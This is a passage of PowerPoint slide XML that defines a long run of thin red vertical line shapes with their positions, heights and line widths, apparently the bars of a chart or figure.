            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="502285">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="502024"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5603">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="object 123"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3249032" y="4989131"/>
            <a:ext cx="0" cy="1001644"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="505460">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="505027"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="object 124"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3268864" y="4470089"/>
            <a:ext cx="0" cy="1517568"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="765810">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="765449"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5603">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="object 125"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3268864" y="4467115"/>
            <a:ext cx="0" cy="1523860"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="768985">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="768451"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126" name="object 126"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3289095" y="5003210"/>
            <a:ext cx="0" cy="984029"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="496569">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="496421"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="object 127"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3289095" y="5000235"/>
            <a:ext cx="0" cy="990320"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="499744">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="499423"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="object 128"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3308929" y="4275722"/>
            <a:ext cx="0" cy="1711354"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="863600">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="863532"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="object 129"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3308929" y="4272748"/>
            <a:ext cx="0" cy="1717646"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="866775">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="866534"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="object 130"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3328761" y="4814394"/>
            <a:ext cx="0" cy="1172781"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="591819">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="591702"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131" name="object 131"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3328761" y="4811421"/>
            <a:ext cx="0" cy="1179073"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="594994">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="594705"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="object 132"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3348596" y="4048037"/>
            <a:ext cx="0" cy="1939115"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="978535">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="978429"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="object 133"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3348596" y="4045060"/>
            <a:ext cx="0" cy="1945407"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="981710">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="981432"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="object 134"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3368428" y="4764413"/>
            <a:ext cx="0" cy="1223115"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="617219">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="616924"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="object 135"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3368428" y="4761439"/>
            <a:ext cx="0" cy="1229407"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="620394">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="619927"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="object 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3388263" y="4336810"/>
            <a:ext cx="0" cy="1650951"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="833119">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="832706"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="object 137"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3388263" y="4333834"/>
            <a:ext cx="0" cy="1657243"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="836294">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="835708"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="object 138"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3408095" y="4997659"/>
            <a:ext cx="0" cy="990320"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="499744">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="499222"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="object 139"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3408095" y="4994683"/>
            <a:ext cx="0" cy="995352"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="502285">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="502225"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="object 140"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3427929" y="4581156"/>
            <a:ext cx="0" cy="1406834"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="709930">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="709401"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="object 141"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3427929" y="4578182"/>
            <a:ext cx="0" cy="1411867"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="712469">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="712404"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="object 142"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3447762" y="5036528"/>
            <a:ext cx="0" cy="951310"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="480060">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="479607"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="object 143"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3447762" y="5033553"/>
            <a:ext cx="0" cy="956345"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="482600">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="482610"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="object 144"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3467596" y="4481197"/>
            <a:ext cx="0" cy="1506243"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="760094">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="759844"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="object 145"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3467596" y="4478221"/>
            <a:ext cx="0" cy="1512535"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="763269">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="762847"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="object 146"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3487428" y="4886591"/>
            <a:ext cx="0" cy="1101055"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="555625">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="555270"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147" name="object 147"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3487428" y="4883615"/>
            <a:ext cx="0" cy="1107347"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="558800">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="558272"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="object 148"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3507661" y="4681112"/>
            <a:ext cx="0" cy="1306166"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="659130">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="658960"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="object 149"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3507661" y="4678139"/>
            <a:ext cx="0" cy="1312458"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="662305">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="661962"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8608">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
